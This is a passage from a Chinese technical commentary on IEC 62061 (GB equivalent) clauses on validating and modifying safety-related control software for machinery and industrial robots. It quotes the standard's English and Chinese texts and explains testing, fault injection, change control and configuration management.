安全相关电气控制系统确认 注:SRECS确认可能形成适用于全部机器设计的确认活动的一部分。 8.1 目的 本条规定用于SRECS的确认程序的要求,包括检查和SRECS测试,以保证达到安全要求规范中陈述的要求。 1. 条款目的与意图 确认活动的目标是证明安全相关机械/工业机器人控制系统软件的实现符合全部需求条款,使各项指标达到预定要求。标准IEC 62061第8章中的内容,对安全相关机械/工业机器人控制系统软件的确认活动进行了规范,规定了确认活动所采用的方法、要求及各项细节。 2. 条款解释与示例 条款8.1明确了确认程序包括检查和SRECS测试两类。检查,对象主要是开发过程中的文档、代码、设计图纸。SRECS测试,一般包括实物测试和仿真测试。实物测试是指利用机械/工业机器人实体,依据安全要求规范的条款开展测试。仿真测试是指利用仿真软件,通过改变仿真参数,从多种角度考查机械/工业机器人是否达到安全要求的测试。实物测试和仿真测试各有利弊。实物测试虽然更真实,但是测试手段有限,不能覆盖全部状态。仿真测试需要占用较大的计算资源,虽然速度较慢,但是测试输入比实物测试丰富,可以设计较为复杂的测试用例。实物测试和仿真测试对比如表5-1所示。 表5-1 实物测试和仿真测试对比 目前,仿真测试的使用比例越来越高。原因是机器人控制系统越来越复杂,功能安全要求越来越高,导致测试工作量急剧提升。从整体成本角度看,在测试要求低、用例数量少的情况下,实物测试成本较低;在测试要求高、用例数量多的情况下,实物测试成本急剧上升。采用仿真测试,能够利用有限的成本,完成更多的测试内容。因此,仿真测试得到广泛应用。 5.2 基本要求 5.2.1 确认活动的依据 【IEC标准条款】 8.2 General requirements 8.2.1 The validation of the SRECS shall be carried out in accordance with a prepared plan (see4.2). NOTE1 In some cases,the safety validation cannot be completed until after installation (for example,when the application software development is not finalized until after installation). NOTE2 Validation of a programmable SRECS comprises validation of both hardware and software.The requirements for validation of software are contained in 6.11.3. 【GB标准条款】 8.2 一般要求 8.2.1 应按照预定计划执行SRECS确认(见4.2)。 注1:有些情况,安全确认只能在安装后才能完成(例如,应用软件开发在安装后才能确定)。 注2:可编程序的SRECS确认由硬件、软件要求确认组成。软件确认要求包括在6.11.3中。 1. 条款目的与意图 条款8.2.1提出了SRECS确认活动的依据。 2. 条款解释与示例 条款8.2.1要求SRECS的确认过程应按照预定的计划执行。依据标准条款4.2,在执行确认活动前,相关责任单位或责任人应该完成确认计划的编制。此时应按照确认计划的内容开展确认活动。 此外,在条款8.2.1的注意事项1中提到,在有些情况下,安全确认只能在安装后才能完成,还特别强调应用软件开发在安装后才能确定。也就是说,对开发出来的应用软件,要将其安装到指定的设备、模块之后,才能开展安全确认活动。在软件安装之前,由于机器人的硬件、本体都无法运转,因此缺少了很多必需的测试条件。 在注意事项2中提到,可编程序的SRECS确认由硬件、软件要求确认组成,并重点提到,软件确认要求已经包括在标准条款6.11.3中。 5.2.2 确认活动的流程 【IEC标准条款】 8.2.2 Each SRCF specified in the SRECS requirements specification (see 5.2),and all the SRECS operation and maintenance procedures shall be validated by test and/or analysis. 【GB标准条款】 8.2.2 SRECS要求规范(见5.2)中规定的各SRCF、所有SRECS操作和维护程序应通过测试和/或分析进行确认。 1. 条款目的与意图 条款8.2.2指出了何时开展确认活动,以及确认活动的形式。 2. 条款解释与示例 条款8.2.2强调了SRECS要求规范是确认活动的核心依据。SRECS要求规范中以文档的方式明确了各个SRCF、所有的SRECS操作和维护程序。而它们都必须进行确认。每个SRCF都需要进行确认是毋庸置疑的。但是所有的SRECS操作和维护程序都要进行确认,则值得探讨。机械/工业机器人是一个复杂的系统,具有多种功能、多种操作模式,同时作为一种机械设备,也需要进行定期维护。开展确认活动,就应覆盖全部的模式、操作、功能、状态,确保机器人在任何情况下,都能够满足功能安全的要求。特别值得说明的是,在执行维护程序时,操作人员一般会突破安全距离,接近机器人。大量事故表明,在维护阶段最容易出现伤人事故。确认活动尤其要重视维护程序的测试严谨性、充分性。 确认的技术手段包括测试和分析。对于在何种条件下适合用测试手段,何种条件下适合用分析手段,确认计划已有明确规定。若在执行阶段发现原有的确认计划缺少相关描述,则应在确认活动实施之前,将其确定下来,并对确认计划进行更新。这里再一次表明,确认计划应该是一个动态更新的计划。在编制计划的时候,受制于时间、经验等因素,不可能做得面面俱到。在实施阶段,应该定期审视确认计划的充分性、正确性,并进行调整。确认计划的更新,应符合标准第9章的要求。 5.2.3 确认活动的成果 【IEC标准条款】 8.2.3 Appropriate documentation of the SRECS safety validation testing shall be produced,which shall state for each SRCF: a) the version of the SRECS safety validation plan being used and the version of the SRECS tested; b) the SRCF under test (or analysis),along with the specific reference to the requirement specified during the SRECS safety validation planning; c) tools and equipment used,along with calibration data; d) the results of each test; e) discrepancies between expected and actual results. 【GB标准条款】 8.2.3 SRECS安全确认的测试应形成恰当文件,对各SRCF应有下列陈述: a)安全确认计划使用的SRECS版本和测试的SRECS版本; b)在SRCF测试(或分析)中、在SRECS安全确认计划期间以及具体涉及规定的要求; c)使用的工具和设备连同校准数据; d)每次测试结果; e)期望结果和实际结果的差异。 1. 条款目的与意图 条款8.2.3指出确认活动要形成文件,并给出了文件内容要求。 2. 条款解释与示例 条款8.2.3明确了SRECS安全确认的测试过程应形成记录文件,也就是在对机械/工业机器人控制系统软件进行确认的测试过程中,要以文件形式记录每个测试用例的信息。确认的过程,是对各个SRCF的测试,而在每个测试用例中,应该记录安全确认计划使用的SRECS版本和测试的SRECS版本。在项目执行过程中,有时候是允许测试与开发并行执行的(前提是经过充分讨论,并且确定并行推进不会对功能安全产生严重影响)。例如,开发团队完成了若干SRCF,形成了一个SRECS中间版本,这时测试团队可以对此版本中已实现的SRCF开展测试,并且在用例中记录当前的版本号,这是测试用例记录的第1个要素。 测试用例记录的第2个要素是对确认计划中的条款进行引用,即对确认计划内容的追踪。测试活动的追踪信息是测试过程中一个很重要的要素,能够用于衡量测试是否充分。对于机械/工业机器人控制系统软件,系统需求分解为软件需求,测试需求是从软件需求中引申出来的,因此测试需求要追溯软件需求。测试项是测试需求的分解和细化,形成测试项与测试需求的追溯关系。每个测试用例都隶属于一个测试项,形成测试用例与测试项的追溯关系。当每一对追溯关系都清晰、完整时,说明测试过程在形式上是符合充分性要求的。 测试用例记录的第3个要素是测试过程中使用的工具、设备,以及校准数据。在确认计划中,已详细描述了测试过程中使用的工具、设备信息。因此,测试用例记录中简单记录工具、设备的标志、索引等关键信息即可。校准数据会影响到测试结果的精度、漂移等,所以在测试用例中应该记录校准数据,保证测试用例可重现。如果校准数据的内容过多,则可以将其保存为附件,并在测试用例记录中进行引用。 测试用例记录的第4个要素是每次测试的结果。 测试用例记录的第5个要素是期望结果和实际结果的差异。期望结果与实际结果存在差异,可能是机械/工业机器人控制系统软件存在缺陷,也可能是用例设计时考虑不周,还可能是环境因素使然。当测试结果与预期不一致时,应该进行分析,确定是否为软件问题。 5.2.4 确认活动的差异处理 【IEC标准条款】 8.2.4 When discrepancies occur,corrective action and re-testing shall be carried out as necessary and documented. 【GB标准条款】 8.2.4 产生差异时,必要时应进行纠正活动和重新测试,并形成文件。 1. 条款目的与意图 条款8.2.4指出了测试过程出现差异时的处理要求。 2. 条款解释与示例 条款8.2.4说明,当期望结果和实际结果出现差异时,根据引起差异原因的不同,应采取不同的纠正活动。若机械/工业机器人控制系统软件确实存在缺陷,则应由开发人员对软件进行修复,并进行回归测试。若测试用例存在缺陷,则测试人员应修正测试用例,重新进行测试。若由环境因素引起测试差异,则测试人员应尽力保证测试环境的稳定性,实在无法满足要求时,可以选择改用分析法进行确认。 以上提到的各类纠正活动都应形成文件,其中最重要的是软件问题记录。在软件问题记录中,应记录软件问题的触发步骤、问题机理、纠正措施、影响分析等内容。 5.3 实施安全完整性确认的详细要求 5.3.1 安全完整性确认的内容 【IEC标准条款】 8.3 Validation of SRECS systematic safety integrity 8.3.1 The following shall be applied: a) functional testing to reveal failures during the specification,design and integration phases,and to avoid failures during validation of SRECS software and hardware shall be applied.This shall include verification (e.g.,by inspection or test) to assess whether the SRECS is protected against adverse environmental influences and shall be based upon the safety requirements specification; NOTE1 See also 6.12.2.1. b) interference immunity testing to ensure that the SRECS is able to satisfy 5.2.3.Testing for immunity to electromagnetic interference need not be performed on SRECS subsystems or subsystem elements where adequate immunity of the SRECS for its intended application can be shown by analysis; NOTE2 The SRECS should,wherever practicable,be loaded with a typical application program,and all the peripheral lines (all digital,analogue and serial interfaces as well as the bus connections and power supply,etc.) are subjected to standard noise signals.In order to obtain a quantitative statement,it is sensible to approach any limits carefully. c) fault insertion testing shall be performed where the required safe failure fraction ≥ 90%.These tests shall introduce or simulate faults in the SRECS hardware and the response documented. 【GB标准条款】 8.3 SRECS系统安全完整性确认 8.3.1 下列要求应适用: a)在规范、设计和集成阶段应采用暴露失效的功能测试,在SRECS软件/硬件的确认期间应采用避免失效的功能测试。这包括验证(例如通过检查或测试),以评估SRECS是否受到保护,防止有害环境的影响,并应符合安全要求规范。 注1:也见6.12.2.1。 b)干扰抗扰度测试用以保证SRECS能够满足5.2.3。对于SRECS子系统或子系统元件不必执行电磁干扰的抗扰度测试,在那儿,SRECS对它的预期应用有足够的抗扰度,通过分析可以表现出来。 注2:SRECS只要可行,用典型应用程序装载,所有外围线路(所有数字、模拟和串行接口,以及总线连接、电源等)要承受标准噪声信号。为了获得定量陈述,对接近限值应谨慎。 c)要求的安全失效系数大于或等于90%时应执行故障插入测试,这些测试应在SRECS硬件中引入或模拟故障,结果应形成文件。 1. 条款目的与意图 条款8.3.1指出了安全完整性确认的适用要求。 2. 条款解释与示例 条款8.3.1提出了3个要求。 一是应该实施功能测试。对机械/工业机器人控制系统软件进行功能测试的目的是暴露在系统需求分析、设计、集成阶段所引入的失效,以及在SRECS软/硬件确认过程中避免出现失效情况。功能测试可以通过检查、测试等验证手段,评估SRECS是否得到良好的保护,避免外界的不良环境影响,并且功能测试应该建立在功能安全需求的基础之上。 二是关于SRECS抗干扰的要求,与软件开发的相关性较小。因此对于机械/工业机器人控制系统软件的开发人员来说,可以暂时将其搁置,待进行系统整机验证时,配合总体人员进行干扰抗扰度的测试即可。 三是当机械/工业机器人要求的安全失效系数大于或等于90%时,应该开展故障插入测试(也称作故障注入测试)。故障注入测试是指模拟SRECS发生故障,并观察SRECS在故障状态下的运作是否符合功能安全要求。可以通过改变硬件状态,如插拔板卡、使某些元器件断开或短路来模拟故障。对于软件而言,故障模拟方法主要是修改程序中的状态变量、修改指定的内存地址等。修改状态变量,可以在不变更硬件的情况下,模拟硬件故障。而修改指定内存地址,则可以模拟内存出现故障时的情景。故障插入测试是一种比较重要的、技术含量较高的测试技术,因此应专门形成故障插入测试的记录文件。本条款与8.3.3b)的差别在于,安全失效系数大于或等于90%时,要对SRECS的硬件和文档中记录的响应进行故障注入,即模拟硬件故障和响应错误;而8.3.3b)则要求当安全失效系数小于90%时,对SRECS的硬件和文档中记录的结果进行故障注入,即模拟硬件故障和执行结果错误。 5.3.2 安全完整性确认的分析要求 【IEC标准条款】 8.3.2 In addition,one or more of the following groups of analytical techniques shall be applied taking into account the complexity of the SRECS and the assigned SIL: a) static and failure analysis; NOTE1 This combination of analytical techniques is only considered suitable for SRECS that implement SRCFs with an assigned SIL not exceeding SIL2. NOTE2 Further information can be found in IEC 61508-7,B.6.4 and B.6.6. b) static,dynamic and failure analysis; NOTE3 This combination of analytical techniques is not recommended for SRECS that implement SRCFs with an assigned SIL below SIL2. NOTE4 Further information can be found in IEC 61508-7,B.6.4,B.6.5 and B.6.6. c) simulation and failure analysis. NOTE 5 This combination of analytical techniques is only considered suitable for SRECS that implement SRCFs with an assigned SIL not exceeding SIL2. NOTE 6 Further information can be found in IEC 61508-7,B.3.6 and B.6.6. 【GB标准条款】 8.3.2 此外,下列一个或多个考虑SRECS的复杂性和指定的SIL的分析技术组应适用: a)静态和失效分析。 注1:这种分析技术的结合只考虑适合SRECS,用指定的SIL,不超过SIL2来执行SRCFs。 注2:进一步的信息可以在GB/T20438.7的B.6.4和B.6.6中找到。 b)静态、动态和失效分析。 注3:这种分析技术的结合并不推荐用于SRECS,用指定的SIL,低于SIL2来执行SRCFs。 注4:进一步的信息可以在GB/T20438.7的B.6.4、B.6.5和B.6.6中找到。 c)模拟和失效分析。 注5:这种分析技术的结合只考虑适合SRECS,用指定的SIL,不超过SIL2来执行SRCFs。 注6:进一步的信息可以在GB/T20438.7的B.3.6和B.6.6中找到。 1. 条款目的与意图 条款8.3.2指出了分析过程中可使用的具体措施。 2. 条款解释与示例 条款8.3.2指出,根据SRECS的复杂度和分配的SIL,应该采取以下几组分析技术(根据复杂度和SIL选择一组或多组)。这些分析技术包括: (1)静态和失效分析。这组分析技术只适用于SRECS所实现SRCF的SIL不超过SIL2时。进一步的信息可以在标准IEC 61508-7的B.6.4和B.6.6中找到。 (2)静态、动态和失效分析。本条款的注意事项中提到,当SRECS所实现SRCF的SIL低于SIL2时,不推荐使用这组分析技术。进一步的信息可以在标准IEC 61508.7的B.6.4、B.6.5和B.6.6中找到。 (3)模拟和失效分析。这组分析技术只适用于SRECS所实现SRCFS的SIL不超过SIL2时。进一步的信息可以在标准IEC 61508.7的B.3.6和B.6.6中找到。 5.3.3 安全完整性确认的测试要求 【IEC标准条款】 8.3.3 In addition,one or more of the following groups of testing techniques shall be applied taking into account the complexity of the SRECS and the assigned SIL: a) black-box testing:a test(s) of the dynamic behaviour under real functional conditions to reveal failures to meet the SRECS functional specification,and to assess utility and robustness of the SRECS; NOTE1 See also 6.12.2.1. b) fault insertion (injection) testing shall be performed where the required safe failure fraction <90%.These tests shall introduce or simulate faults in the SRECS hardware and the results documented; c)"worst-case"testing shall be performed to assess the extreme (i.e.worst) cases specified by application of the analytical techniques (see 8.3.2); NOTE2 The operational capacity of the SRECS and its component dimensioning is tested under worst-case conditions.The environmental conditions are changed to their highest permissible marginal values.The most essential responses of the SRECS are inspected and compared with the safety requirements specification. d) field experience:the use of field experience from different applications as one of the measures to avoid faults during SRECS validation. NOTE3 See also 6.12.2. 【GB标准条款】 8.3.3 此外,下列一个或多个考虑SRECS的复杂性和指定的SIL的测试技术组应适用: a)黑箱测试:在实际功能状态下的动态行为测试,从而暴露失效,以满足SRECS功能规范,并评定SRECS的有效性和鲁棒性。 注1:也见6.12.2.1。 b)如果安全失效系数小于90%,则应执行故障插入(注入)测试。这些测试应在SRECS硬件中引入或模拟故障,结果形成文件。 c)应执行“最坏情况”测试,以评定用分析技术指定的极端(即最坏)情况(见8.3.2); 注2:在最坏的情况下,对SRECS的操作能力及其元件的尺寸进行测试。环境条件变化到最高所能允许的边缘值。检查SRECS的最基本响应,并与安全要求规范比较。 d)现场测试:使用来自不同应用的现场经验作为一种措施,以避免SRECS确认期间出现故障。 注3:也见6.12.2。 1. 条款目的与意图 条款8.3.3指出了测试过程中可使用的具体措施。 2. 条款解释与示例 条款8.3.3指出根据SRECS的复杂性和分配的SIL,应该采取以下几组测试技术(根据复杂性和SIL选择一组或多组)。这些测试技术包括: (1)黑箱测试:在实际功能状态下的动态行为测试,可以达到以下3个目的:一是暴露失效;二是达到SRECS功能规范的要求;三是评定SRECS的有效性和鲁棒性。黑箱测试就是把机械/工业机器人控制系统软件看作一个黑箱子,通过产生各种真实的输入激励,构建真实的应用场景,并对软件输出的结果进行判断,实现测试的目的。同时,条款6.12.2.1中也有相关描述。 (2)当机械/工业机器人要求的安全失效系数小于90%时,应该开展故障插入测试(也称作故障注入测试)。条款8.3.3和8.3.1 c)的差别,见对8.3.1 c)的解读。 (3)应执行“最坏情况”测试,以评定极端(最坏)情况下机械/工业机器人控制系统软件的行为。通过对系统和软件应用相应的分析技术(见条款8.3.2),可以获得软件的极端(最坏)情况。“最坏情况”测试需要把软件的输入条件设定为环境条件变化所能允许的最大值,检查SRECS的最基本响应,并与安全要求规范进行比较。 (4)现场测试:充分使用来自不同领域应用的现场经验,以避免SRECS确认期间出现故障。相关信息可以参考条款6.12.2。 第6章 安全相关机械/工业机器人控制系统软件的修改 6.1 软件修改的目标和流程 6.1.1 软件修改的目标 【IEC标准条款】 9 Modification 9.1 Objective This Clause specifies the modification procedure(s) to be applied when modifying the SRECS during design,integration and validation (e.g.during SRECS installation and commissioning). 【GB标准条款】 9 修改 9.1 目的(国家标准中此条款无内容) 1. 条款目的与意图 条款9.1指出了SRECS进行修改时的目标要求。 2. 条款解释与示例 条款9.1明确了修改的适用范围。如果在SRECS安装和试运行时发现机械/工业机器人控制系统软件存在问题、缺陷、隐患,或者系统需求发生变化,增加或减少了若干功能,则必然要修改机械/工业机器人控制系统软件。此时,就要按照标准IEC 62061的第9章内容,实施软件的修改。 6.1.2 软件修改的流程 【IEC标准条款】 9.2 Modification procedure 9.2.1 The request for a modification of the SRECS can arise from,for example: -safety requirements specification changed; -conditions of actual use; -incident/accident experience; -change of material processed; -modifications of the machine or of its operating modes. NOTE Interventions (e.g.adjustment,setting,repairs) on the SRECS made in accordance with the information for use or instruction manual for the SRECS are not considered to be a modification in the context of this Clause. 【GB标准条款】 9.2 修改程序 在SRECS设计、集成和确认期间(例如,SRECS安装和试运行时),本条规定的修改程序适用。 9.2.1 修改SRECS的要求源自下列情况: ——安全要求规范变化; ——实际使用条件; ——附带事件/偶然事故经验; ——加工材料变化; ——机器修改或其操作模式改变。 注:按照SRECS的使用信息或说明书对其进行的干预(例如调整、设置、修理),本条不考虑修改。 1. 条款目的与意图 条款9.2指出了修改程序要求,包括修改原因等。 2. 条款解释与示例 条款9.2.1指出了引起SRECS修改的原因,包括: (1)安全要求规范变化。在机械/工业机器人控制系统软件的设计、编码、调试、安装、升级等过程中,对系统的安全要求是可能发生变化的。安全要求规范变化的原因可能来自客户的改变、政策的改变、标准规范的更新、新技术新工具的发布等。因为安全要求是整个功能安全保障活动的源头,因此安全要求规范的变化是重要等级最高的变化,要引起最高的重视。 (2)实际使用条件。机械/工业机器人实际的使用条件发生变更,如部署密度的变化、使用频率的变化会导致机械/工业机器人控制系统软件面临的风险发生改变。风险的应对措施也应随风险的变化而改变,从而导致SRECS要求需要修改。 (3)附带事件/偶然事故经验。在机械/工业机器人控制系统软件的研制过程中,如果同类产品发生了偶然事故,并总结出相应的经验教训,那么SRECS要求就应该在经验教训之上改变,以更好地规避系统风险。 (4)加工材料变化。加工材料的变化会引起系统运行状态的变化,如系统的耐温、耐磨、抗震性能发生变化。因此机械/工业机器人控制系统软件也必须进行修改,以补偿物理性质的改变,因此SRECS要求就需要变更。 (5)机器修改或其操作模式改变。当机器在预定状态之外进行修改,或者改变操作模式时,机械/工业机器人控制系统软件的运行基础发生了改变,从而使得SRECS要求需要变更。然而,在SRECS的使用信息或说明书中对其进行的干预(调整、设置、修理等)是在机器的预定状态之内进行的,在安全要求的范围内,所以这种干预不会引起SRECS要求的改变。 6.1.3 软件修改的要求 【IEC标准条款】 9.2.2 The reason(s) for the request for a modification of the SRECS shall be documented. 9.2.3 The effect of the requested modification shall be analyzed to establish the effect on the functional safety of the SRECS. 9.2.4 The modification impact analysis and the effect on the functional safety of the SRECS shall be documented. 9.2.5 All accepted modifications that have an effect on the SRECS shall initiate a return to an appropriate design phase for its hardware and/or for its software (e.g.specification,design,integration,installation,commissioning,and validation).All subsequent phases shall then be carried out in accordance with the procedures specified for the specific phases in this standard.All relevant documents shall be revised,amended and reissued accordingly. 9.2.6 Based on those revised documents,a complete action plan shall be prepared and documented before carrying out any modification. 【GB标准条款】 9.2.2 要求修改SRECS的原因应生成文件。 9.2.3 要求修改的影响应进行分析,以建立SRECS的功能安全效果。 9.2.4 修改的效果分析和其对SRECS功能安全影响的分析应形成文件。 9.2.5 对SRECS有影响的所有可接受的修改应开始返回到硬件和/或软件的适当设计阶段(例如规范、设计、集成、安装、试运行和确认)。所有后续阶段应按照本标准中的特定阶段所规定的程序执行。所有相关文件应修订、修改和再版。 9.2.6 以那些经过修订的文件为基础,在执行任何修改前应该准备一个完整的行动计划,并形成文件。 1. 条款目的与意图 条款9.2.2到9.2.6对修改过程的文件修订等内容提出了要求。 2. 条款解释与示例 条款9.2.2要求就修改SRECS的原因形成文件。SRECS修改,从源头上对机械/工业机器人控制系统软件的整个开发活动产生了影响。开发人员要重新分析,对必须修改的模块重写代码,并进行调试。同时,需要对修改后的软件进行回归测试,并以更新后的SRECS要求对机械/工业机器人控制系统软件再次进行确认。修改SRECS所带来的影响如此之大,有必要以文件的形式明确为何要修改SRECS、修改后的SRECS是怎样的,并以此为文件新的输入,开展后续的变更与修改活动。 条款9.2.3明确了开发人员应分析SRECS修改所带来的影响,确保SRECS的功能安全效果能够符合要求。SRECS修改的分析过程:第一步是利用追踪关系,分析受影响的机械/工业机器人控制系统软件需求;第二步是根据需求的变更,调整软件的设计,并修改对应的功能安全计划、验证计划、确认计划,提前部署相关的回归测试工作;第三步是根据修改后的设计文件,对软件的代码进行修改,同时设计相应的回归测试用例;代码修改完成并通过调试后,执行最后一步,依据修改后的验证计划、确认计划,开展机械/工业机器人控制系统软件的回归测试工作。 条款9.2.4要求开发人员对机械/工业机器人控制系统软件的修改结果进行分析并形成文件。通过比对方式,将需求规格说明、设计文件、软件代码中的更改部分,以新旧对比的方式形成文档,并且分析软件代码修改过程是否对其他未修改的模块产生影响。分析过程中,尤其需要注意软件的修改对SRECS功能安全的影响。 条款9.2.5要求开发人员在对SRECS进行修改的时候,首先要把研制流程回溯到合适的阶段,如规范、设计、集成、安装、试运行和确认,然后重新执行后续的开发流程,原有的相关文件要进行修订、修改,并发布新的版本。 条款9.2.6要求开发人员以修订过的文档作为基础,在执行任何一个修改前,准备一个完整的行动计划,并形成文件。这个行动计划第一要记录原有的设计状态,记录原有的设计状态是以此作为一个关键分支点的,当机械/工业机器人控制系统软件的修改达不到既定目标时,能够恢复到分支点处,重新开始下一次尝试;第二是要规划实施修改过程的每一个步骤,并对每一个步骤的约束、条件、风险、应对措施等进行详细描述;第三是要规划修改过程所需要的资源、进度,并给出阶段考核指标。 6.2 软件修改后的配置管理流程要求 6.2.1 配置管理程序 【IEC标准条款】 9.3 Configuration management procedures 9.3.1 The configuration management procedures shall be implemented in accordance withthe functional safety plan (see4.2.1) taking into account the following: a) a plan of each modification process; b) a documentation of the decision making process and each SRECS-relevant decision; c) a chronological documentation (e.g.a logbook) of the change request procedures including ·identified hazards which can be affected; ·description of the change request (hardware and/or software); ·reason(s) for the change request (see also 9.2.1); ·decision made (and authorization for each decision); ·the impact analysis; ·re-verification (of each phase) and revalidation; ·all documents affected by the change request activities; ·all activities which were carried out during the change process and the persons/entities who were responsible for them; d) documentation of the following information to permit a subsequent audit: ·configuration status; ·release status; ·the justification for and approval of all modifications; ·the details of the modification. 【GB标准条款】 9.3 配置管理程序 9.3.1 配置管理程序应按照功能安全计划(见4.2.1)执行,并应考虑下列因素: a)各修改过程的计划。 b)决策过程和各SRECS相关决定的文件。 c)改变要求程序的按时间顺序排列的文件(例如工作日志),包括: ·识别可能受影响的危险; ·改变要求(硬件和/或软件)的描述; ·改变要求的原因(也见9.2.1); ·做决定(和每个决定的授权); ·影响分析; ·重新验证(对各阶段)和重新确定; ·受改变要求活动影响的所有文件; ·在改变过程中执行的所有活动和负责这些活动的人/实体。 d)下列信息的文件,允许随后审查: ·配置状况; ·版本状态; ·所有修改和批准的理由; ·修改的细节。 1. 条款目的与意图 条款9.3.1指出了配置管理程序的要求。 2. 条款解释与示例 条款9.3.1重点描述了配置管理程序的文件要求。功能安全计划是配置管理程序的顶层文件。所有配置管理活动,应在功能安全计划中明确。制定配置管理程序时,要考虑以下的因素。 第一,各修改过程的计划。在不同的开发过程,以及机械/工业机器人控制系统软件发生修改的时候,都会伴随配置管理活动的发生。因此配置管理程序中要考虑修改过程的实施计划,把修改过程的必要管理活动纳入配置管理程序。 第二,决策过程和各SRECS相关决定的文件。通常,决策过程会经历多次讨论,逐步形成修改意见。从级别上看,决策讨论可以分为组内讨论、部门讨论、内部专家讨论、行业专家讨论等多种层次。配置管理程序中应对决策讨论的层次、次数要求进行规定,以降低系统风险。各SRECS相关决定的文件,如评审意见、会议纪要等,应作为配置管理的对象,写入配置管理程序。 第三,需求变更过程的各个文件,这些文件是按照时间顺序逐个发布的,从而形成了一个类似工作日志的文件序列。这些文件包括: (1)危险分析结果,即识别机械/工业机器人控制系统软件修改过程中可能产生的危险因素。 (2)描述需要调整、修改的机械/工业机器人控制系统软件需求,用没有歧义、清晰的文字,给出具体的、明确的变更要求。 (3)说明为什么要对机械/工业机器人控制系统软件需求进行修改,可以从紧迫性、必要性等方面进行分析(见标准条款9.2.1)。 (4)决定性文件,即描述本次修改如何实施,包括哪些步骤,并且要给出每个决定的授权,即批准某个决定的签批文件。 (5)影响分析,即分析本次修改会对机械/工业机器人控制系统软件已有模块、已实施工作产生怎样的影响。 (6)重新验证(对各阶段)和重新确定,记录对机械/工业机器人控制系统软件修改过程各阶段的重新验证,以及重新确定的过程、结果,即将回归测试用例经过充分讨论的签批意见归档。 (7)受需求变更活动影响的所有文件均要进行版本升级并归档。 (8)需要记录在机械/工业机器人控制系统软件需求变更中执行的所有活动,负责实施每个活动的人或实体,都应有相应的签名记录。 第四,配置状况、版本状态、所有的修改和批准的理由、修改的细节等文件都允许随后审查。 6.2.2 实施变更的流程 【IEC标准条款】 9.3.2 The procedures for an appropriate change-control-process should consider the requirements of a) procedures for defining a unique baseline of each version of the SRECS; b) definition of all configuration items of a baseline.This shall include at least -safety requirements analysis and specification; -relevant design documents; -hardware and/or software modules; -test plans and results; -verification and validation reports; -pre-existing software components which are to be incorporated into the SRECS; -tools and development environments which are used for create and test; -accurately maintaining with unique identification of all configuration items which are necessary to maintain the integrity of the SRECS; -change control procedures to: ·prevent unauthorized modifications, ·document change requests, ·analyse the impact of a proposed change request and approve or reject the request, ·document the details of and the authorization for all approved modifications, ·establish a configuration baseline at appropriate points in the hardware or software development and to document the (partial) integration testing which justifies the baseline, ·guarantee the composition of and the building of all hardware or software baselines (including the rebuilding of earlier baselines); -an effect analysis,which should assess the impact of each change request.This analysis shall include also an appropriate hazard analysis and shall take into account all other modification activities of a SRECS; -returning to an appropriate design phase for the hardware and/or software (e.g.specification,design,integration,installation,commissioning and validation) of the SRECS for all accepted modifications that have an impact on the SRECS.All subsequent phases shall then be carried out in accordance with this standard; -carrying out of all necessary operations to demonstrate that the required safety integrity has been reached; -authorization to carry out the required change request activity shall be dependent on the results of the impact analysis. 【GB标准条款】 9.3.2 适当改变-控制-过程的程序应考虑下列要求: a)为每个SRECS版本定义唯一的基线程序。 b)基线所有配置项目的定义至少包括: ——安全要求分析和规范; ——有关设计文件; ——硬件和/或软件模块; ——测试计划和结果; ——验证和确认报告; ——已存在的软件部件,将并入SRECS; ——创建和测试用的工具和开发环境; ——所有配置项有唯一标识的准确维护,对保持SRECS的完整是必要的; ——改变控制程序,从而: ·阻止未授权的修改; ·文件改变要求; ·分析所提出改变要求的影响,批准或拒绝该要求; ·所有批准的修改细节和授权文件; ·在硬件或软件开发中,在适当点建立配置基线,并记录(部分的)集成测试,该测试证明基线是正确的; ·保证所有硬件或软件基线的构成和建造(包括以前基线的再建造)。 ——效果分析,应对每个改变要求进行评定。该分析也应包括合适的危险分析并应考虑SRECS的所有其他修改活动。 ——对SRECS有影响的所有可接受的修改,返回到SRECS的硬件和/或软件的适当设计阶段(例如规范、设计、集成、安装、试运行和确认)。所有后续阶段应按照本标准执行。 ——执行所有必要的操作,证明已达到所要求的安全完整性。 ——对执行必要的改变要求活动的授权应取决于影响分析的结果。 1. 条款目的与意图 条款9.3.2指出了变更的流程要求。 2. 条款解释与示例 条款9.3.2指出了“适当改变-控制-过程”程序应考虑的要求。 第一,为每个SRECS版本定义唯一的基线程序。基线是一个计算机术语,是配置管理库中每个SRECS版本在特定时期的一个“快照”。本条款说明,在机械/工业机器人控制系统软件的开发过程中要有一个机制,确定每一个特定版本的基线,并且每个版本仅有一个基线。需要注意的是,不是每一次版本升级都是一个基线。基线是机械/工业机器人控制系统软件进行修改的参照物。每个版本都应该有自身的参照物。当机械/工业机器人控制系统软件进入阶段性的稳定期时,就应该重新确定一条基线,即把某一个版本的软件,作为后续版本的参照物。 第二,定义基线的全部配置项,即对于每一个作为基线版本的机械/工业机器人控制系统软件,都需要提交成果(程序、源代码、文档等)。标准给出了基线版本软件所必备的成果内容,即最低要求。必备成果内容如下。 (1)安全要求的分析和规范,即在机械/工业机器人控制系统软件开发的策划阶段形成的安全要求分析结果、标准规范、内部要求等文档。 (2)有关的设计文件,即在机械/工业机器人控制系统软件开发的设计阶段形成的概要设计、详细设计文档。在详细设计文档层次,应该把软件的架构、所有流程、算法都描述清楚,能够以文档中所描述的模型,通过逻辑推理,推演出软件的运行过程。必要时,应采用建模语言完成软件模型的设计。 (3)硬件、软件模块。机械/工业机器人所使用的硬件、软件模块应建立标识制度,根据标识可以确定唯一的硬件型号、配置、软件模块及版本。这里的软件既包括开发中的软件,也包括购置的、重用的软件模块。配置管理库中引用软/硬件的标识,确定机械/工业机器人软/硬件的唯一构成。 (4)测试计划和结果,包括验证计划、确认计划、验证结果、确认结果。验证结果、确认结果主要是指执行的测试用例、发现的问题信息等。 (5)验证和确认报告。验证和确认报告是配置管理库中一个比较重要的部分,可以说明机械/工业机器人控制系统软件是否达到既定的目标和要求。在配置管理过程中,要对验证和确认报告给予重视。 (6)已存在的软件部件。这些软件部件主要是指外购的、重用的软件部件。这些部件的执行体、静态或动态库、源代码等应纳入配置管理,因为这些部件会被并入SRECS。因此,要求这些软件模块受控,防止执行体或源代码被恶意篡改。 (7)机械/工业机器人控制系统软件创建和测试用的工具和开发环境也要纳入配置管理。举个例子,苹果公司的开发工具Xcode曾被黑客篡改并在网上散布,导致大量的苹果App被植入了恶意代码。因此,对工具和开发环境的控制,关系到机械/工业机器人控制系统软件的安全。 